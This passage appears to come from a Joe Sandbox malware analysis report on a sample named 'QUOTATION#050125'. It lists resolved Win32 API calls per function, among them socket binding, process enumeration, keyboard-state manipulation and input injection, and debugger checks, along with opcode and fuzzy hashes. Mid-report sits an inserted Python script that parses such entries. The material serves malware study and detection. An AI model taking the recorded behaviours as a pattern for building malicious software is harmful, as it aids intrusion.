                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                                      • String ID: *.*
                                                                                      • API String ID: 1927845040-438819550
                                                                                      • Opcode ID: d8d452bc164fc491316ca2a956d7f5e1a1787628be7a92dc82682d5639fb22f9
                                                                                      • Instruction ID: 84e00c77be1a4f644101be8d447ee1ff954f64f310b71f49594754ac97c27627
                                                                                      • Opcode Fuzzy Hash: d8d452bc164fc491316ca2a956d7f5e1a1787628be7a92dc82682d5639fb22f9
                                                                                      • Instruction Fuzzy Hash: 1F41407190420A9FDF15DFA4C989EEEBBB8EF05311F244159E815A7191EB709E84CFA0
                                                                                      APIs
                                                                                        • Part of subcall function 000D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 000D9BB2
                                                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 000D9A4E
                                                                                      • GetSysColor.USER32(0000000F), ref: 000D9B23
                                                                                      • SetBkColor.GDI32(?,00000000), ref: 000D9B36
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Color$LongProcWindow
                                                                                      • String ID:
                                                                                      • API String ID: 3131106179-0
                                                                                      • Opcode ID: 48c011ad5ecc2b97f36ea975d01babe8c9866c361953640fca2d578ea7dfac06
                                                                                      • Instruction ID: c3ab8990297ea0961d8dc42fe186d89394f93761fe7e66a009944c2a2610ac99
                                                                                      • Opcode Fuzzy Hash: 48c011ad5ecc2b97f36ea975d01babe8c9866c361953640fca2d578ea7dfac06
                                                                                      • Instruction Fuzzy Hash: E9A1F771208604FEE739AA2C8C59DBF36ADDB42350F15021BF512DABD1DB259D81D2B3
                                                                                      APIs
                                                                                        • Part of subcall function 0014304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
                                                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0014185D
                                                                                      • WSAGetLastError.WSOCK32 ref: 00141884
                                                                                      • bind.WSOCK32(00000000,?,00000010), ref: 001418DB
                                                                                      • WSAGetLastError.WSOCK32 ref: 001418E6
                                                                                      • closesocket.WSOCK32(00000000), ref: 00141915
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                                      • String ID:
                                                                                      • API String ID: 99427753-0
                                                                                      • Opcode ID: b3b8ac8a21a4c504985d2bc7be117bcd5ae13ecacc425704f2a2659970d230e6
                                                                                      • Instruction ID: d743a702904d5f1eac80f92ddf855cca5d642b8fb4d5128690956551c9e690f7
                                                                                      • Opcode Fuzzy Hash: b3b8ac8a21a4c504985d2bc7be117bcd5ae13ecacc425704f2a2659970d230e6
                                                                                      • Instruction Fuzzy Hash: DB518275A00210AFEB10AF24C886F6E77E5AF44718F58845CF91A5F3D3D771AD828BA1
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                      • String ID:
                                                                                      • API String ID: 292994002-0
                                                                                      • Opcode ID: 32c552ba3542d3dfcc7077a38b92a90fa9e15f9fb7618ce9b145a13e9e8dba38
                                                                                      • Instruction ID: 7eaf7446c71c640527b3a4b6254985b7820eff138de8e003c54c855acc3a8c2c
                                                                                      • Opcode Fuzzy Hash: 32c552ba3542d3dfcc7077a38b92a90fa9e15f9fb7618ce9b145a13e9e8dba38
                                                                                      • Instruction Fuzzy Hash: 59219131740211EFD7228F1AC884F6A7BA5AF95326B59806CEC5A8F351D772EC46CB90
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                                                      • API String ID: 0-1546025612
                                                                                      • Opcode ID: 0ac5fca57935855bef588b8e1e422e2c109edec0d239854d71dd5114d4a01200
                                                                                      • Instruction ID: bcb9f5da3d53189d31ad1bfc75a8ed28ccc248fb836e8312290ebb979463bdca
                                                                                      • Opcode Fuzzy Hash: 0ac5fca57935855bef588b8e1e422e2c109edec0d239854d71dd5114d4a01200
                                                                                      • Instruction Fuzzy Hash: E6A28470E0061ACBDF34CF58C944BAEB7B2BF54310F2481AAE855A7285EBB49D91CF54
                                                                                      APIs
                                                                                      • CoInitialize.OLE32(00000000), ref: 00136639
                                                                                      • CoCreateInstance.OLE32(0015FCF8,00000000,00000001,0015FB68,?), ref: 00136650
                                                                                      • CoUninitialize.OLE32 ref: 001368D4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateInitializeInstanceUninitialize
                                                                                      • String ID: .lnk
                                                                                      • API String ID: 948891078-24824748
                                                                                      • Opcode ID: 801bd954eea960ea59f4d5cbb0c3c454e8fa1be0778ddd3a915dce8fddca16ca
                                                                                      • Instruction ID: ce5be1620e316509957a47a630d095e63d83f84d983e290b7717e0c6659eb2b3
                                                                                      • Opcode Fuzzy Hash: 801bd954eea960ea59f4d5cbb0c3c454e8fa1be0778ddd3a915dce8fddca16ca
                                                                                      • Instruction Fuzzy Hash: 2BD12A71508301AFD314EF24C881EABB7E8EF99704F50896DF5558B292DB71E906CB92
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                      • API String ID: 0-2761157908
                                                                                      • Opcode ID: 34d9f2d45f9533c6b358f12e7917ce322b9070a1e395aa0335b0c3b43628a890
                                                                                      • Instruction ID: facc1f046acf5843595898a69fe43feaab5f4c898d87d0ecd95efaec6ec0be1b
                                                                                      • Opcode Fuzzy Hash: 34d9f2d45f9533c6b358f12e7917ce322b9070a1e395aa0335b0c3b43628a890
                                                                                      • Instruction Fuzzy Hash: A4C25872E086298FDB64CE28DD407FAB7B5EB44304F1441EADA0DE7651E778AE819F40
                                                                                      APIs
                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 0014A6AC
                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 0014A6BA
                                                                                      • Process32NextW.KERNEL32(00000000,?), ref: 0014A79C
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0014A7AB
                                                                                        • Part of subcall function 000DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00103303,?), ref: 000DCE8A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                                      • String ID:
                                                                                      • API String ID: 2000298826-0
                                                                                      • Opcode ID: 0df2ea767849c457e8768d4ae310ce6a7a5b98d3fa5fb954d4ad4c969ecfeed4
                                                                                      • Instruction ID: e16b1ae372f47376193db9afcd8ea7ffa8e1e89b6d6fe7ad8de9fb20bd11fbfc
                                                                                      • Opcode Fuzzy Hash: 0df2ea767849c457e8768d4ae310ce6a7a5b98d3fa5fb954d4ad4c969ecfeed4
                                                                                      • Instruction Fuzzy Hash: 895108715083019FD710DF24C886EAEBBE8FF89754F40491DF59A972A2EB31D905CBA2
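Each entry above lists, per recovered function, the Win32 calls the sandbox resolved with their raw hex arguments, followed by the similarity fields (API ID, String ID, API String ID, Opcode ID, Instruction Fuzzy Hash). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in the layout shown on this page into records, splits the API String ID into its two numeric halves (inferred from the page, where an empty API ID yields a leading 0 and an empty String ID a trailing 0), and renders the few argument constants I am confident of by name (socket family/type/protocol, the CompareStringW locale and flag, WM_CHAR, PF_FASTFAIL_AVAILABLE). The embedded SAMPLE is the UDP-socket entry and the Process32 entry copied from the report text above, with the Associated-dump and snapshot lines omitted for brevity; the regexes, the record layout and the DECODERS table are my assumptions about this page's text, not a documented Joe Sandbox export format.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed input: two entries copied from the report text above (Associated and
# snapshot lines dropped). The layout is this page's rendering, not an export format.
SAMPLE = """\
APIs
  • Part of subcall function 0014304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0014307A
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0014185D
• WSAGetLastError.WSOCK32 ref: 00141884
• bind.WSOCK32(00000000,?,00000010), ref: 001418DB
• WSAGetLastError.WSOCK32 ref: 001418E6
• closesocket.WSOCK32(00000000), ref: 00141915
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• API String ID: 99427753-0
• Opcode ID: b3b8ac8a21a4c504985d2bc7be117bcd5ae13ecacc425704f2a2659970d230e6
• Instruction Fuzzy Hash: DB518275A00210AFEB10AF24C886F6E77E5AF44718F58845CF91A5F3D3D771AD828BA1
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0014A6AC
• Process32FirstW.KERNEL32(00000000,?), ref: 0014A6BA
• Process32NextW.KERNEL32(00000000,?), ref: 0014A79C
• CloseHandle.KERNEL32(00000000), ref: 0014A7AB
  • Part of subcall function 000DCE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00103303,?), ref: 000DCE8A
Similarity
• API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
• String ID:
• API String ID: 2000298826-0
• Opcode ID: 0df2ea767849c457e8768d4ae310ce6a7a5b98d3fa5fb954d4ad4c969ecfeed4
• Instruction Fuzzy Hash: 895108715083019FD710DF24C886EAEBBE8FF89754F40491DF59A972A2EB31D905CBA2
"""

# One API line: optional "Part of subcall function XXXX:" prefix, Name.MODULE, optional
# "(args)", then "ref: ADDR". Calls without arguments (WSAGetLastError) have no parens.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                         # int per argument, None where the report shows '?'
    ref: int                           # call-site address
    subcall_of: Optional[int] = None   # set for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id: str = ""
    string_id: str = ""
    api_hash: int = 0       # left half of "API String ID"; 0 when API ID is empty (assumed)
    string_hash: int = 0    # right half; 0 when String ID is empty (assumed)
    opcode_id: str = ""
    fuzzy_hash: str = ""

def parse_report(text):
    """One FunctionRecord per entry; an entry ends at its 'Instruction Fuzzy Hash' line."""
    records, cur = [], FunctionRecord()
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            raw = m.group("args")
            args = [] if raw is None else [None if a == "?" else int(a, 16) for a in raw.split(",")]
            sub = m.group("sub")
            cur.calls.append(ApiCall(m.group("api"), m.group("mod"), args,
                                     int(m.group("ref"), 16), int(sub, 16) if sub else None))
            continue
        f = FIELD_RE.match(line)
        if not f:
            continue
        key, val = f.group("key"), f.group("val")
        if key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.string_id = val
        elif key == "API String ID":
            a, s = val.split("-")
            cur.api_hash, cur.string_hash = int(a), int(s)
        elif key == "Opcode ID":
            cur.opcode_id = val
        elif key == "Instruction Fuzzy Hash":
            cur.fuzzy_hash = val
            records.append(cur)
            cur = FunctionRecord()
    return records

# Win32 constants for arguments the report prints as raw hex, keyed by (API, arg index).
DECODERS = {
    ("socket", 0): {2: "AF_INET", 23: "AF_INET6"},
    ("socket", 1): {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},
    ("socket", 2): {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"},
    ("CompareStringW", 0): {0x409: "LCID_en_US"},
    ("CompareStringW", 1): {1: "NORM_IGNORECASE"},
    ("PostMessageW", 1): {0x102: "WM_CHAR"},
    ("IsProcessorFeaturePresent", 0): {23: "PF_FASTFAIL_AVAILABLE"},
}

def describe(call):
    """Render a call with symbolic names where DECODERS knows the value, hex otherwise."""
    parts = []
    for i, a in enumerate(call.args):
        parts.append("?" if a is None else DECODERS.get((call.api, i), {}).get(a, f"0x{a:X}"))
    return f"{call.api}({', '.join(parts)})"

def find_calls(records, api):
    """(record index, call) for every call to `api`, subcall lines included."""
    return [(i, c) for i, r in enumerate(records) for c in r.calls if c.api == api]

if __name__ == "__main__":
    for i, rec in enumerate(parse_report(SAMPLE)):
        print(f"[{i}] api_hash={rec.api_hash} fuzzy={rec.fuzzy_hash[:16]}...")
        for c in rec.calls:
            print("    " + describe(c))
```

Run against the whole report text rather than SAMPLE to get a record per function; the api_hash and fuzzy_hash fields are what you would key on when checking whether a second sample's report contains the same UDP-bind or process-walk routine.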
                                                                                      APIs
                                                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0012AAAC
                                                                                      • SetKeyboardState.USER32(00000080), ref: 0012AAC8
                                                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0012AB36
                                                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0012AB88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                                      • String ID:
                                                                                      • API String ID: 432972143-0
                                                                                      • Opcode ID: 0db559f4b03878ec7e1a2c6d28bd689e3a5a77039898dc7a9b1ca5d4e7bf34da
                                                                                      • Instruction ID: 54da06744b220e1ca42f67a3b4830adb48a13c7bbdabfeab80d90d2aa51dc230
                                                                                      • Opcode Fuzzy Hash: 0db559f4b03878ec7e1a2c6d28bd689e3a5a77039898dc7a9b1ca5d4e7bf34da
                                                                                      • Instruction Fuzzy Hash: C6314B30A40328AFFF35CB68EC05BFE7BA6AF54310F84421AF581961D0D37599A5C7A2
                                                                                      APIs
                                                                                      • InternetReadFile.WININET(?,?,00000400,?), ref: 0013CE89
                                                                                      • GetLastError.KERNEL32(?,00000000), ref: 0013CEEA
                                                                                      • SetEvent.KERNEL32(?,?,00000000), ref: 0013CEFE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorEventFileInternetLastRead
                                                                                      • String ID:
                                                                                      • API String ID: 234945975-0
                                                                                      • Opcode ID: 9f5d1874e3ce7b65695395cc492a0232441eb43523e312183c6b285455f70680
                                                                                      • Instruction ID: c6be232bac8370517148c79276cf7bdb498aca5f1b8d4203b6c2f6c7288562ea
                                                                                      • Opcode Fuzzy Hash: 9f5d1874e3ce7b65695395cc492a0232441eb43523e312183c6b285455f70680
                                                                                      • Instruction Fuzzy Hash: 6A21BAB1500705EFEB20DFA5C948BAABBFCEB40358F10442EE646A6151E770EE448BA0
                                                                                      APIs
                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 000E084B
                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 000E0916
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 000E0936
                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 000E0940
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                      • Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                      • String ID:
                                                                                      • API String ID: 254469556-0
                                                                                      • Opcode ID: 0b1f7405c5ebe7c74b7d89d655892405144399323b08c135b2812fac97f86357
                                                                                      • Instruction ID: bc782dd6fdf55923674a85959408f767190cc528a758b38a7cabc18be9040cc7
                                                                                      • Opcode Fuzzy Hash: 0b1f7405c5ebe7c74b7d89d655892405144399323b08c135b2812fac97f86357
                                                                                      • Instruction Fuzzy Hash: 23312775D0135CDFDB20EFA5D9897CDBBB8AF18300F1041AAE408AB251EBB45A848F45
APIs
• lstrlenW.KERNEL32(?,00105222), ref: 0012DBCE
• GetFileAttributesW.KERNEL32(?), ref: 0012DBDD
• FindFirstFileW.KERNEL32(?,?), ref: 0012DBEE
• FindClose.KERNEL32(00000000), ref: 0012DBFA
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: FileFind$AttributesCloseFirstlstrlen
• String ID:
• API String ID: 2695905019-0
• Opcode ID: def91458aadf37262f6dc29bf64214f0161d874ae701f306d898c94f327c03a1
• Instruction ID: c370d8df1162d1e897619221db79ca135d4e1cc66fae14f974dc8b436ed284cc
• Opcode Fuzzy Hash: def91458aadf37262f6dc29bf64214f0161d874ae701f306d898c94f327c03a1
• Instruction Fuzzy Hash: B1F0A030810B209B82246F78FC0D8AA376D9F02336B10470AF836D24E0EBB059B4C6D6
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,000E0D40,0015FE34,00000017), ref: 000E0C26
• UnhandledExceptionFilter.KERNEL32(0015FE34,?,000E0D40,0015FE34,00000017), ref: 000E0C2F
• GetCurrentProcess.KERNEL32(C0000409,?,000E0D40,0015FE34,00000017), ref: 000E0C3A
• TerminateProcess.KERNEL32(00000000,?,000E0D40,0015FE34,00000017), ref: 000E0C41
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
• String ID:
• API String ID: 3231755760-0
• Opcode ID: a8efd84882c4c2f81154ba2c652d1521ad788c6577092ca437f3f78bfccea109
• Instruction ID: 5bfd3bf9d8a4dd6a11e52e044fc0efa008a1c135e330f5a2cd407f5934d7c015
• Opcode Fuzzy Hash: a8efd84882c4c2f81154ba2c652d1521ad788c6577092ca437f3f78bfccea109
• Instruction Fuzzy Hash: 3AD0EA7204430CEFDA802FE1EC0DA697F68BB19A57F088450F70ACA862DA7155918BE6
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 001282AA
Strings
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.0000000000182000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641394653.000000000018C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641440256.0000000000194000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_c0000_QUOTATION#050125.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
• Opcode ID: 33d203fba6ed5718d4a4644130a92062c1e739db583ce0dc3777b78ff891ef3c
• Instruction ID: de142dacf061b0bcea1a70d23d5400b6179f202124812df7364798c8645f5f2e
• Opcode Fuzzy Hash: 33d203fba6ed5718d4a4644130a92062c1e739db583ce0dc3777b78ff891ef3c
• Instruction Fuzzy Hash: 78323474A007159FCB28CF19D481AAAB7F0FF48710B15C46EE49ADB3A1EB70E991CB50
APIs
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00163700), ref: 000FBB91
• WideCharToMultiByte.KERNEL32(00000000,00000000,0019121C,000000FF,00000000,0000003F,00000000,?,?), ref: 000FBC09
• WideCharToMultiByte.KERNEL32(00000000,00000000,00191270,000000FF,?,0000003F,00000000,?), ref: 000FBC36
Memory Dump Source
• Source File: 00000002.00000002.288641044282.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
• Associated: 00000002.00000002.288640988128.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.288641235709.000000000015C000.00000002.00000001.01000000.00000003.sdmp
